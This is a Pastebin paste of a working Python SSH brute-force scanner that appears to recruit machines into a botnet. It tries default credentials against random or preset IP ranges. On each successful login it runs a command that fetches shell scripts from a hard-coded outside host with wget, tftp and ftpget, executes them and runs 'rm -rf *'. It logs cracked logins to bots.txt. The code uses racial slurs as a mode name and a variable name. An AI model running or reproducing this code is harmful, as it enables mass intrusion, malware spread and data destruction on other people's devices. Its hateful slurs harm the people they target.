Advertisement
Guest User

Untitled

a guest
Jan 2nd, 2017
197
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.03 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # Modified by @ch3ats
  3. #oo.ooooo. oooo oooo oooo d8b .oooooooo .ooooo.
  4. # 888' `88b `888 `888 `888""8P 888' `88b d88' `88b
  5. # 888 888 888 888 888 888 888 888ooo888
  6. # 888 888 888 888 888 `88bod8P' 888 .o
  7. # 888bod8P' `V88V"V8P' d888b `8oooooo. `Y8bod8P'
  8. # 888 d" YD
  9. #o888o "Y88888P'
  10. # ~{purge ****Public**** python scanner}~
  11.  
  12. # Public scanner
  13. # Usage: python purge.py THREADS RANGES 1(slow but effective) 2(fast but less effective) HERE IS A EXAMPLE
  14. # Examples Below
  15. # python purge.py 500 NIGGER 1 1
  16. # python purge.py 500 TELNET 1 4
  17. # python purge.py 500 BABY 1 6
  18. # python purge.py 500 SATAN 1 3
  19. # python purge.py 500 B 101.109 1
  20. # RANGES 113.53, 119.93, 122.3, 122.52, 101.108, 180.180, 125.27, 101.109,
  21. #passwords 1, 2,3,4,5,6,7
  22. import threading, paramiko, random, socket, time, sys
  23.  
  24. paramiko.util.log_to_file("/dev/null")
  25.  
  26. blacklist = [
  27. '127'
  28. ]
  29.  
  30. passwords = [
  31. "admin:admin"
  32. "root:root"
  33. "root:admin"
  34. "telnet:telnet"
  35. "guest:guest"
  36. "admin:admin"
  37. "admin:1234"
  38. "pi:raspberry"
  39. "vagrant:vagrant"
  40. "ubnt:ubnt"
  41. ]
  42.  
  43.  
  44. if sys.argv[4] == '1':
  45. passwords = ["root:root"]
  46. if sys.argv[4] == '2':
  47. passwords = ["guest:guest"]
  48. if sys.argv[4] == '3':
  49. passwords = ["admin:1234"]
  50. if sys.argv[4] == '4':
  51. passwords = ["telnet:telnet"]
  52. if sys.argv[4] == '5':
  53. passwords = ["root:root", "admin:1234"]
  54. if sys.argv[4] == '6':
  55. passwords = ["root:root", "root:admin"]
  56. if sys.argv[4] == '7':
  57. passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  58. if sys.argv[4] == '8':
  59. passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  60. if sys.argv[4] == 'perl':
  61. passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt"]
  62.  
  63. print "\x1b[1;32m************************************\x1b[1;35m"
  64. print "\x1b[1;32m* The Purge Has Begun *\x1b[1;35m"
  65. print "\x1b[1;32m* There Is No Turning Back Now *\x1b[1;35m"
  66. print "\x1b[1;32m************************************\x1b[1;35m"
  67.  
  68. ipclassinfo = sys.argv[2]
  69. if ipclassinfo == "A":
  70. ip1 = sys.argv[3]
  71. elif ipclassinfo == "B":
  72. ip1 = sys.argv[3].split(".")[0]
  73. ip2 = sys.argv[3].split(".")[1]
  74. elif ipclassinfo == "C":
  75. ips = sys.argv[3].split(".")
  76. num=0
  77. for ip in ips:
  78. num=num+1
  79. if num == 1:
  80. ip1 = ip
  81. elif num == 2:
  82. ip2 = ip
  83. elif num == 3:
  84. ip3 = ip
  85. class sshscanner(threading.Thread):
  86. global passwords
  87. global ipclassinfo
  88. if ipclassinfo == "A":
  89. global ip1
  90. elif ipclassinfo == "B":
  91. global ip1
  92. global ip2
  93. elif ipclassinfo == "C":
  94. global ip1
  95. global ip2
  96. global ip3
  97. def run(self):
  98. while 1:
  99. try:
  100. while 1:
  101. thisipisbad='no'
  102. if ipclassinfo == "A":
  103. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  104. elif ipclassinfo == "B":
  105. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  106. elif ipclassinfo == "C":
  107. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  108. elif ipclassinfo == "BABY": # password 6
  109. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  110. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  111. elif ipclassinfo == "LRAB": #password 7
  112. yeet = ["122","119","161","37","186","187","31","188","201","2","168"]
  113. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  114. elif ipclassinfo == "NIGGER": # password 1
  115. lucky = ["125.27","101.109","113.53","118.173","46.62","5.78","125.25","125.26","182.52","125.24","180.180"]
  116. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  117. elif ipclassinfo == "SATAN": #password 3
  118. lucky2 = [ "122.3","122.52","122.54","119.93","124.105","125.104","49.144","49.145","59.69","119.91","119.92","49.146" ]
  119. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  120. elif ipclassinfo == "TELNET": # password 4
  121. lucky2 = [ "103.20","103.30","103.47","103.57","12.188","12.34","13.92","14.150","14.162" ]
  122. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  123. elif ipclassinfo == "RAND":
  124. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  125. elif ipclassinfo == "INTERNET":
  126. lol = ["1"]
  127. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  128. else:
  129. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  130. for badip in blacklist:
  131. if badip in self.host:
  132. thisipisbad='yes'
  133. if thisipisbad=='no':
  134. break
  135. username='root'
  136. password=""
  137. port = 22
  138. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  139. s.settimeout(3)
  140. s.connect((self.host, port))
  141. s.close()
  142. ssh = paramiko.SSHClient()
  143. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  144. dobreak=False
  145. for passwd in passwords:
  146. if ":n/a" in passwd:
  147. password=""
  148. else:
  149. password=passwd.split(":")[1]
  150. if "n/a:" in passwd:
  151. username=""
  152. else:
  153. username=passwd.split(":")[0]
  154. try:
  155. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  156. dobreak=True
  157. break
  158. except:
  159. pass
  160. if True == dobreak:
  161. break
  162. badserver=True
  163. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  164. output = stdout.read()
  165. if "inet addr" in output:
  166. badserver=False
  167. if badserver == False:
  168. print '\x1b[1;32mFound \x1b[1;31m '+self.host+'~\x1b[1;35m'+username+'~\x1b[1;36m'+password+'~\x1b[1;33m'+str(port)
  169. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.129.177.57/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.129.177.57 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.129.177.57; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.129.177.57 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  170. nigger = open("bots.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  171. time.sleep(15)
  172. ssh.close()
  173. except:
  174. pass
  175.  
  176. for x in range(0,1500):
  177. try:
  178. t = sshscanner()
  179. t.start()
  180. except:
  181. pass
  182.  
  183.  
  184.  
  185.  
  186. your a bunch of dumnasses
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement